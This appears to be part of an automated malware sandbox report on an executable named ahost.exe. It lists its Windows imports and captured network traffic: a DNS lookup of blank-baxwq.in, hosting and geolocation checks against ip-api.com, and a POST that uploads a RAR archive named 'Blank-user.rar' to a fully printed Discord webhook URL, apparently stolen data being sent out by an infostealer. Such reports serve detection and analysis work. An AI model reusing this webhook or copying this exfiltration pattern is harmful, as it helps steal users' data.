HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:37:16.185651064 CET	49713	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:16.306261063 CET	80	49713	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:16.307910919 CET	49713	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:16.308120012 CET	49713	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:16.428749084 CET	80	49713	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:17.405354023 CET	80	49713	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:17.413181067 CET	49713	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:17.533217907 CET	80	49713	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:17.536746979 CET	49713	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:53.318042040 CET	49721	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:53.437958956 CET	80	49721	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:53.438045025 CET	49721	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:53.438298941 CET	49721	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:53.558474064 CET	80	49721	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:54.656085968 CET	80	49721	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:54.698497057 CET	49721	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:55.031466007 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:55.031501055 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:55.031692028 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:55.059180021 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:55.059211969 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.277925014 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.278510094 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.278522968 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.279664993 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.279743910 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.281414986 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.281481981 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.281768084 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.281768084 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.281784058 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.281810045 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.281981945 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282018900 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282143116 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282176971 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282322884 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282356977 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282382965 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282393932 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282442093 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282453060 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282473087 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282489061 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282506943 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282516956 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282535076 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282547951 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282586098 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282596111 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282627106 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282645941 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.282663107 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282701015 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282728910 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282747984 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282772064 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282835960 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282891035 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282913923 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.282958984 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.323343039 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.323472977 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.323729038 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.323781013 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.323807001 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.323827028 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.323971033 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.324009895 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.324033976 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.324084997 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367336988 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.367578030 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367611885 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367626905 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367644072 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367688894 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367702007 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367728949 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367748976 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.367779016 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.415333033 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.415452003 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.459332943 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.524395943 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.524559975 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:56.524600029 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:56.753602028 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:57.726248026 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:57.726337910 CET	443	49722	162.159.135.232	192.168.2.9
Dec 13, 2024 08:37:57.726409912 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:57.727139950 CET	49722	443	192.168.2.9	162.159.135.232
Dec 13, 2024 08:37:57.933957100 CET	49721	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:37:58.054203033 CET	80	49721	208.95.112.1	192.168.2.9
Dec 13, 2024 08:37:58.054275990 CET	49721	80	192.168.2.9	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:37:13.390150070 CET	54872	53	192.168.2.9	1.1.1.1
Dec 13, 2024 08:37:13.618942976 CET	53	54872	1.1.1.1	192.168.2.9
Dec 13, 2024 08:37:15.979211092 CET	65531	53	192.168.2.9	1.1.1.1
Dec 13, 2024 08:37:16.117997885 CET	53	65531	1.1.1.1	192.168.2.9
Dec 13, 2024 08:37:53.179717064 CET	62207	53	192.168.2.9	1.1.1.1
Dec 13, 2024 08:37:53.317044973 CET	53	62207	1.1.1.1	192.168.2.9
Dec 13, 2024 08:37:54.892791986 CET	50373	53	192.168.2.9	1.1.1.1
Dec 13, 2024 08:37:55.030165911 CET	53	50373	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:37:13.390150070 CET	192.168.2.9	1.1.1.1	0x6dc7	Standard query (0)	blank-baxwq.in	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:15.979211092 CET	192.168.2.9	1.1.1.1	0x78f7	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:53.179717064 CET	192.168.2.9	1.1.1.1	0xc84f	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:54.892791986 CET	192.168.2.9	1.1.1.1	0x6f97	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:37:13.618942976 CET	1.1.1.1	192.168.2.9	0x6dc7	Name error (3)	blank-baxwq.in	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:16.117997885 CET	1.1.1.1	192.168.2.9	0x78f7	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:53.317044973 CET	1.1.1.1	192.168.2.9	0xc84f	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:55.030165911 CET	1.1.1.1	192.168.2.9	0x6f97	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:55.030165911 CET	1.1.1.1	192.168.2.9	0x6f97	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:55.030165911 CET	1.1.1.1	192.168.2.9	0x6f97	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:55.030165911 CET	1.1.1.1	192.168.2.9	0x6f97	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:37:55.030165911 CET	1.1.1.1	192.168.2.9	0x6f97	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49713	208.95.112.1	80	7328	C:\Users\user\Desktop\ahost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:37:16.308120012 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:37:17.405354023 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:37:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49721	208.95.112.1	80	7328	C:\Users\user\Desktop\ahost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:37:53.438298941 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 13, 2024 08:37:54.656085968 CET	381	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:37:54 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49722	162.159.135.232	443	7328	C:\Users\user\Desktop\ahost.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:37:56 UTC	302	OUT	POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 694040 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=57f85f30d1587e66d117b2081c55215c
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 2d 2d 35 37 66 38 35 66 33 30 64 31 35 38 37 65 36 36 64 31 31 37 62 32 30 38 31 63 35 35 32 31 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 74 69 6e 61 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 f6 3f ec 96 21 04 00 00 01 0f f3 fc f3 47 b4 e4 55 bb 8c b0 7d a4 5e 92 c7 bd 0a bc 29 10 bd d7 8c 3b 7b 03 99 45 cd ac 30 76 ac c0 af 65 76 a8 3c d0 58 8a ac 7e b7 4d 07 14 da ee 71 49 53 a5 aa 1e 7d 80 a6 1f 18 62 d8 93 c5 c1 d6 93 3f df 72 29 09 4e ff 77 6e 43 65 41 e6 b6 d1 72 5f 67 3c Data Ascii: --57f85f30d1587e66d117b2081c55215cContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!?!GU}^);{E0vev<X~MqIS}b?r)NwnCeAr_g<
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 3a 92 98 79 3a 43 ce 3c f6 0f b8 36 7f aa f7 83 4e f4 aa 04 d7 3e c1 a5 09 1a 9a 13 a9 3e 67 e0 59 b9 7e fe 84 7c 11 73 a0 a2 09 7d f1 6e 9e 82 d8 2b 50 ce 05 a5 63 00 dc ea c7 62 ad e3 7b b0 77 c6 ee 6d 94 fa f2 f2 49 50 93 1a fe 60 17 eb 1c 37 d4 e8 f4 7a ad a0 fd f6 bc 9f 4d 6f d4 a5 fa b5 35 0c f3 58 82 89 3f a3 58 7b df 51 49 86 cf e9 a2 bc 0a d1 fa e8 6b 91 76 8d ff c8 7b fe 2a 5c 47 e8 2a 6a 6b 01 c0 31 84 c3 5e cc 2e f0 9d ce cb dd cd 39 75 b2 38 40 8e 9d ce 4f 73 83 c6 f9 d0 f4 85 58 96 a2 c6 b9 b3 51 4d 61 8a cb b1 67 21 61 c9 b6 cf 22 bf ac ca a8 e4 4e 66 4c 20 98 4b 69 3c a9 88 d2 e0 d3 de b0 f2 76 78 b2 96 01 ec ef 6e 7b 96 f3 d6 eb c3 b5 78 fe d7 9e a6 e8 0c f7 84 e6 69 cd 72 56 75 0c 11 af 64 ad 9b a6 16 ac 4f fc 05 b4 84 bf 80 cc 71 9e 7d Data Ascii: :y:C<6N>>gY~\|s}n+Pcb{wmIP`7zMo5X?X{QIkv{\Gjk1^.9u8@OsXQMag!a"NfL Ki<vxn{xirVudOq}
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 96 21 e6 9f d5 72 11 99 c3 2f 6c 7d 98 01 74 a6 9b 47 ec 6c 0b 52 5e a3 88 39 08 ca 8a 85 4d b0 12 2b 1d c3 0d b2 29 82 8c cd 4c 2a 6e b3 53 93 fd cd 35 15 e7 01 b0 a0 9b 98 1d 9a ab 16 5c 52 20 83 ad 80 45 53 00 da ed c4 63 8e 12 93 3a d6 6c cc c7 89 e9 bb 39 2a e1 a1 6c d9 b6 fc 58 6c fb d3 e9 14 71 83 a0 f0 45 44 35 04 a3 3e 7a 8f 88 07 e8 4f 56 b5 63 4f be 71 e7 b5 b1 d2 34 4a f0 6b 4c 45 e8 c4 77 3f c7 97 ba e5 af 1b c9 24 41 8f c7 ed ce e7 b4 c7 18 63 f9 4d ed 8f c8 10 70 61 12 7f 6b a2 29 d5 a2 ea d3 2a d8 70 17 0b 75 7b f7 4a 25 34 d8 10 af 7e 98 63 8f 38 d9 1c 27 bb ec fe ca 02 c7 d2 d3 3a 7f 97 43 32 fa 2d e2 a7 ad 11 7a 28 d6 cd 2c 84 f3 bd 54 ce 50 9f a4 3c 8f 2f fe 0a fb c6 e6 59 c3 90 2a 44 24 cd 51 fc 39 4d a7 a8 25 08 42 59 a1 81 a3 7a d4 Data Ascii: !r/l}tGlR^9M+)LnS5\R ESc:l9lXlqED5>zOVcOq4JkLEw?$AcMpak)pu{J%4~c8':C2-z(,TP</YD$Q9M%BYz
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 79 cc 80 1f 9f 4d cd b4 39 dc 9c e1 06 a4 7f 85 67 cc 32 9f 56 43 05 e9 69 84 4c c8 c2 33 c2 be 47 d5 ea 1a c3 4b 1d 96 81 27 a7 c4 08 57 c8 eb 2d 54 2d f2 62 1f be ff 95 dd aa b3 0d c3 2c bc 00 70 53 35 34 86 78 f6 41 61 67 10 11 bc 65 a6 f0 b3 69 f6 7e ea 45 3a 3f 7d 2a 94 65 f2 00 c5 d7 49 c7 25 5f bf ae c9 b5 3b ae 52 06 87 50 bd 33 0e 8e e2 a9 75 5a 0f 97 f9 6c f3 38 08 94 2a 5b c6 57 30 d6 a4 cf 5f 86 f9 fa fc e7 a4 b5 78 f5 b3 6e cd 7e e9 2b 8a e1 1b cd f9 17 d7 0f e3 64 a2 63 e6 53 1e 41 b0 2e 67 33 2f f0 a6 fb 65 c1 ec 86 d3 a6 62 26 0c ce 1f de c5 2a ed 49 01 3d b7 b3 21 9f 0d f6 b8 83 c5 84 43 43 2a a1 78 20 95 c6 0d 30 63 be 69 14 cf d2 be ef a4 b9 df 39 76 d1 2e 61 a1 3f a1 f4 17 a3 77 e2 5d f6 f8 3e 36 d6 eb 3f 1b 47 3c 3c 2f 9d 2e b1 d4 88 Data Ascii: yM9g2VCiL3GK'W-T-b,pS54xAagei~E:?}eI%_;RP3uZl8[W0_xn~+dcSA.g3/eb&I=!CCx 0ci9v.a?w]>6?G<</.
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: be db 40 fe be 11 6f 69 61 e4 28 97 88 28 c3 c2 67 c6 58 4d b2 21 4a e8 05 fd 15 a2 19 24 fa 08 12 1a cb 8f 6b d3 99 b4 e6 e8 93 dd 75 a1 c4 c9 3d c3 f4 68 a8 83 e7 66 8c ee 74 9d 6a 98 c2 dc 55 9e a8 37 39 92 a0 7e 32 41 69 b9 97 46 6b 9a 3f b4 03 a9 9e 41 f9 00 59 a2 d1 53 5b 30 14 a5 a3 35 df 0a f6 b8 55 76 ca 61 20 5e f0 91 e0 4e c5 60 a8 8f 09 4c af 25 ed 13 64 5a 23 49 47 1f 9c 89 3f 00 c6 f9 eb 1e 28 27 5c 0a 33 fe 51 d0 6e 5c c2 b9 ff 0e 24 f3 35 25 c4 90 52 2c 3f 04 de 2c 50 27 99 82 74 a8 07 5b 60 92 42 0a 9c ee 5d e0 f8 64 cf f7 4b b1 5a 24 be 88 d1 63 86 ab b4 e0 ce 3a f6 14 59 ee 0d 2c 7f 9d fc c6 61 4c 93 8d 0e 19 38 14 1a 77 35 1f ee a9 67 2e 0b dd 5a f6 5c 14 18 61 0b ac de f8 67 0f 47 17 22 53 d2 4a ba d1 aa de 81 d5 c6 70 43 31 05 8e be Data Ascii: @oia((gXM!J$ku=hftjU79~2AiFk?AYS[05Uva ^N`L%dZ#IG?('\3Qn\$5%R,?,P't[`B]dKZ$c:Y,aL8w5g.Z\agG"SJpC1
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 64 34 14 05 fd 26 11 a7 83 80 f0 f9 87 85 83 81 7e a7 74 6f 2a 68 50 03 d8 96 09 0d 9a df 0b 02 25 e8 39 9b f8 45 8d 19 90 a1 ff 9b 3f ac e3 7e 62 14 5f f9 13 e9 4f b4 6a 85 6c a5 ee d8 e3 26 6c bc c9 2b 00 58 2d 8f 12 ac 20 9f 5d e0 00 85 7b 0f af 7d d2 26 28 03 fa 18 5c 0d 3e fb ef c0 b0 0f 7e c4 62 4c 9d 09 d7 6b aa 5a 66 be 21 f7 79 8c de 26 4a 0c ee 15 80 b7 ae 6d 05 ab 24 5a c0 77 22 7a b3 03 50 56 0e 90 f3 9c 8c 21 fc bb 05 af 34 93 34 fa 12 bd 43 b6 b3 4c 6d ad b9 5d 74 8a d8 75 b5 e5 e2 1b 9a e2 72 91 78 e1 d9 3e 39 8f 8c 7b bd b3 16 ec 3e e0 45 92 44 54 66 c2 e8 47 d9 f4 83 67 61 eb f6 2f fe 64 21 eb 46 da 61 a9 95 03 bb 76 71 a2 96 61 b8 4c 8d 1c 3c 6b 5f dd 74 e5 4a 8f ff d4 49 fe dd 6e 70 f4 4a c4 ed 8f ad a5 91 4f e1 d0 d0 bc d2 15 5c c2 85 Data Ascii: d4&~to*hP%9E?~b_Ojl&l+X- ]{}&(\>~bLkZf!y&Jm$Zw"zPV!44CLm]turx>9{>EDTfGga/d!FavqaL<k_tJInpJO\
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 86 54 12 70 71 15 c5 85 ca 33 69 fb 49 dc 18 61 da 20 d5 93 37 fb c0 1a b1 9c 3e d3 0a 87 3f 66 8d fd 2a 78 bd 2d 95 55 14 39 81 78 99 66 e5 e8 3b 7e b2 ba fe 00 ae 83 3d f5 22 36 2b fc 53 35 bf e4 8f bb c8 a1 3b 00 e5 1e a4 5f a9 68 79 c7 94 ef 5b 3a 0b 1a 86 0d 39 20 6b 94 4d 38 67 07 90 27 20 54 d4 63 35 67 d8 0c db 5e a5 1c 19 ee 07 75 83 d2 c9 d5 24 89 bd 35 dc 0d b7 c5 bd d6 e7 59 40 a0 50 5d 23 41 08 4e cc 9b 33 b4 ee ba ec 77 9d 50 ba 0a ba 39 04 48 67 5b b3 3b 23 83 bf f9 92 a1 6d 08 02 90 40 84 94 8d 9c 7d c1 39 7d 36 38 6d a9 53 89 54 37 75 29 c6 22 6c 92 73 a5 47 99 02 f4 6a 15 bd 73 dd 37 7b 34 57 fd 9a f9 13 cf 87 94 39 6c 34 8b 37 47 16 65 60 86 4a 6f 6a cc 91 0b c6 d2 bb b1 bb 1f 2d b2 8f 89 46 f2 91 f2 a4 04 a3 37 9d 34 0a bf 31 15 b6 91 Data Ascii: Tpq3iIa 7>?f*x-U9xf;~="6+S5;_hy[:9 kM8g' Tc5g^u$5Y@P]#AN3wP9Hg[;#m@}9}68mST7u)"lsGjs7{4W9l47Ge`Joj-F741
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 48 b6 83 8f 01 ec 70 f2 cc 72 89 cf 0e fd 10 96 d6 ae 9a 91 55 76 ed fc b1 25 08 a8 57 b4 5e 92 de 36 69 34 df 7b e4 bb b2 e0 0d 74 a7 66 2b 5d e9 86 34 0a 4e 93 32 3f 78 42 17 d6 88 88 51 e0 ec d1 91 3c 7b 4e ad 04 15 67 6c 07 60 0e 41 14 64 f2 99 93 1d 33 6a b0 73 e8 b3 db f8 dd 21 fb ce 0e 79 14 ff 5b 4e 0c 70 a2 39 e2 e4 8c ea d2 cc 16 07 39 4d e6 d2 cf d9 88 b9 e5 dc 6e cd 30 b9 89 b5 cb 00 22 e1 c8 c3 f3 dc ef 11 50 b2 1e 0f 06 70 bb 7b dc ed 0d fe 85 fb a1 fc 08 7a c2 0a 22 01 85 eb 19 62 bf 7b 70 50 9a 7f fb 07 10 6d 59 ad 5f a1 3f 28 34 76 4a 31 9d 5c 07 70 b1 55 6c c6 fd 67 40 27 2c 6e 22 44 c7 0b 28 8d ca 42 5c b4 4e 6e c6 0e b4 29 cf 27 65 5f e2 63 e7 d9 73 32 62 c8 db 27 dc 53 e7 ce 13 a7 3e db 52 d2 7d 10 14 c3 9e ce 2b e0 55 c1 44 ff ea 9b Data Ascii: HprUv%W^6i4{tf+]4N2?xBQ<{Ngl`Ad3js!y[Np99Mn0"Pp{z"b{pPmY_?(4vJ1\pUlg@',n"D(B\Nn)'e_cs2b'S>R}+UD
2024-12-13 07:37:56 UTC	16384	OUT	Data Raw: 91 87 19 82 e4 ec 16 36 34 8f 87 22 7e b4 fa f4 26 04 62 a4 4a 85 6f a9 8f 49 5c d6 61 b7 ec 58 1a 7d 08 a9 c2 29 e8 39 fd c3 29 05 4c 3f ec 65 10 d1 ae 9f 6e 45 6b 05 11 ab 93 96 7d c4 7b d7 73 31 aa 96 e0 cf 88 1d 50 85 4c 82 2e 40 50 48 4c a3 55 98 fd 25 87 a2 9d 38 16 87 2a 72 22 67 b9 68 7c bd 81 1b b6 82 66 55 e5 39 0c a0 90 91 dd e1 d6 0e 5b 26 74 ff dd 70 c3 e3 f8 ab f2 e3 08 e1 54 7f 7a 20 3e f2 57 7e 90 b2 eb 75 f0 39 8f bc 6a 46 19 3c c5 44 bb fd d7 dd 11 79 50 cb f3 d9 22 89 86 e9 87 12 7b c0 f3 cb 6e 7e ea 83 01 a0 a5 f9 12 44 ae 50 06 44 83 d6 b2 f5 1a 2b 36 42 9e a0 81 98 84 3e 7f 9c fe 86 df 4a f8 3f 63 0c ec 4d e5 98 06 5b bf bd 0e f8 00 81 f9 6e 3a ba 82 69 33 03 5f a7 8b fb 98 2c 8e b8 2b 08 98 96 8c 6d 3a d8 1e 08 1b fc 19 b3 56 e5 99 Data Ascii: 64"~&bJoI\aX})9)L?enEk}{s1PL.@PHLU%8*r"gh\|fU9[&tpTz >W~u9jF<DyP"{n~DPD+6B>J?cM[n:i3_,+m:V
